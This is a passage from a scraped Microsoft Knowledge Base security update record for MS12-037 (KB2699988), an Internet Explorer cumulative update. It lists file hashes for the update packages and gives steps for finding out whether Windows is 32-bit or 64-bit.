class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">8B4E63BA4900116D2227F88183FF494BC06E9D45</td><td class=\"sbody-td\">4090137752AD08F62916E2A6FA7C9E661FDB3537C14F785194B89AFC0FCB2334</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">107D9F72134E1FF575FAE9ED16B60B36647C25EB</td><td class=\"sbody-td\">4A1046C48D29A513334BE91B76D690E9718B9E2DE1CD16D65DB0B2E25046B608</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">6F2B39C9AF06A72E724241A719D06857BBFBAA8D</td><td class=\"sbody-td\">9A44D9A71188C5E4271EF8EEB14122BA6A425E99133738230F749CA960D4B48B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">B0D54D1DA00ACB42FB3C0FF81B8048B2BCD50AF4</td><td class=\"sbody-td\">F904BDD9E1269B6618D78261F932FA9B4266DA74D8D35AC936944529BF4087A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">BB9E3614A4A3E572F080469259B00C4B18876A91</td><td class=\"sbody-td\">0554173C3BA7F0B9B283DDB97491A5A005DA07939D5CB8596867CEA3BDE55C09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">E980F6D8C67C815CB4A13F90FE9B95236C155D44</td><td class=\"sbody-td\">6725573CAE445A150E98817ADA75396AD5A87A932B8BF0F50E4A8FD50E41F7D0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-enu.exe</td><td class=\"sbody-td\">0184DDB117FBA7995BA952CBC13474CBF7960913</td><td class=\"sbody-td\">370A76B4AF1EDE8DFC7DEFF22FFF27A7D506A789F2E92FC98CB6F4A02F54BD9B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-deu.exe</td><td 
class=\"sbody-td\">0FFB1E1F646FCD08168CA53FDE9FAD82F9870610</td><td class=\"sbody-td\">949C1CF4F4B7569BC58C62764295A1E3F0962C6DA0CD336BA1199B7F66AB5B26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-jpn.exe</td><td class=\"sbody-td\">E2D113A096E2EA9B8A743179CD2FD2FACF273C2B</td><td class=\"sbody-td\">E8BB0EB8F73DFA7B3A84A9869CBE69B9ECC942F4CB3BDB1EE26C99D1F4C26116</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-fra.exe</td><td class=\"sbody-td\">F30CC7836C069322A5FB6FB044A0A44BE20B8209</td><td class=\"sbody-td\">A9FD42F7BBEC37C75172473795CC0B7D1A3A2946BE67689D69EEC31FD537E303</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">FF645B69FB06C8A18709B9840E0C7B0608BCFE04</td><td class=\"sbody-td\">223B5749BECBCADA6E4B4B6F39B5CEFF3F5D8429468077CC1DA219E27ED88573</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">B48AD2EA8AD544ADF1B769560B66D9C6681E03C1</td><td class=\"sbody-td\">EC1486C6E6F6B8F00C98AD584D5DA73B485E9362B6BC123667AB8992E26E25BF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">F6042848D82ABD64A02446964EE7C665E7994A7B</td><td class=\"sbody-td\">B208D9E76562EFB04AD93B1C215AE72BE7A0D195F79579F6D3601AF09E2CA766</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">7583ED693D1938572073EE8393BD9330A6DC2B8A</td><td class=\"sbody-td\">49E1BF303EFB221E531300A4EF32A42533DEFC7B03FE89144FEE6AD8494A8603</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">6A880E2D1AEEBDDC921BBF97EC61CF3670A52CC0</td><td class=\"sbody-td\">A88C6B635C475BE0377FAC5E02E94A2035075E8DBED4A01DDBF568C5A97F58A2</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">5ED4D92C574800D725817E29E70676BFD890E959</td><td class=\"sbody-td\">7DBD1B8F44A620533EFAB48A7088BA71BB5A6FFCE084C15E950BA085F95376EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.1-kb2699988-x86.msu</td><td class=\"sbody-td\">EFBD38FFFCBD41D42565FBB2B5C81A7C6D481702</td><td class=\"sbody-td\">941F302F5A001E8B3FF8C30D6432B52F904DC35144EB7A01BD2D6B6BB6D50F05</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">69FE2E4BDAB981ABEC1835920574F4232333A60C</td><td class=\"sbody-td\">1B6E95EB67518AB0A29E42C9CA865DB35F7D8AE928594002E39EE3DBCCB62D2D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">880BAA435CC75F813ED336F2A2CD79A47EE816DC</td><td class=\"sbody-td\">28F88822D3573C39DDC1840CC74FEFC7F25FBBB826DF7256AB9B2B486C32EE9C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">2DD679D6DD90B0E9DAAB849E8C0323F206387C58</td><td class=\"sbody-td\">95628E28AE52312CB60336D944C7450799323CB1EA7E9E1E049FCDF1F77D1404</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">19AE7498A0D539EEAA5E2A8F2D28277B22E856C8</td><td class=\"sbody-td\">D10912B18159C8B7F2020F45DBE151EDD1C6E4C993FDAFC2BBF50DDE0B61C365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">1A76EA27842C198D817CFD55843015D0DE559DF6</td><td class=\"sbody-td\">D3BA1973BB786B482BBECA33C04349A017A7E4E8A060369AD7AF2DE73544B808</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64-custom.msu</td><td class=\"sbody-td\">75684F371AFF3CF1447A8CFB1E216060CE4EC7C7</td><td 
class=\"sbody-td\">0FF51FB9C7F23B421945D9BFFC60B1BE931B98E268206352586B391DF0E3B607</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">AA13BEE8A823317B7ACEB466607F367387B5BCD5</td><td class=\"sbody-td\">C68187086AD80289FB7382950C8C997F659C69BE65884E17D293182270058DBC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">FA89FAEA099735E482318B8140262F201D3905C8</td><td class=\"sbody-td\">46AF8E91EBBBCCEDA0783395792B1A0B13DB1DBAED84EEFDD0614F011D003AAB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64-custom.msu</td><td class=\"sbody-td\">98D65BE591213EA09F5F0175BDA8087D46C397DA</td><td class=\"sbody-td\">F6EB40B592B9CF69023258612F355B5EACE3EAB3FE24501E2DD04507BB97DC3D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86-custom.msu</td><td class=\"sbody-td\">BF57BE47A45B77D4DC8B5400065870FD7A46A466</td><td class=\"sbody-td\">F167531A7F5DC8A5BD213D905E7168F0DB9649A2CCF44E819725A0023B902FD6</td></tr></table></div><h3 class=\"sbody-h3\">How to determine whether you are running a 32-bit or a 64-bit edition of Windows<br/></h3>If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>. </li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong> and then press ENTER. 
</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<br/><ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>. </li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>. </li></ul></li></ol><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-27\">827218 </a>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system<br/></div></span></div></body></html>", "edition": 16, "modified": "2012-07-11T22:57:36", "id": "KB2699988", "href": "https://support.microsoft.com/en-us/help/2699988/", "published": "2012-06-12T00:00:00", "title": "MS12-037: Cumulative Security Update for Internet Explorer: June 12, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}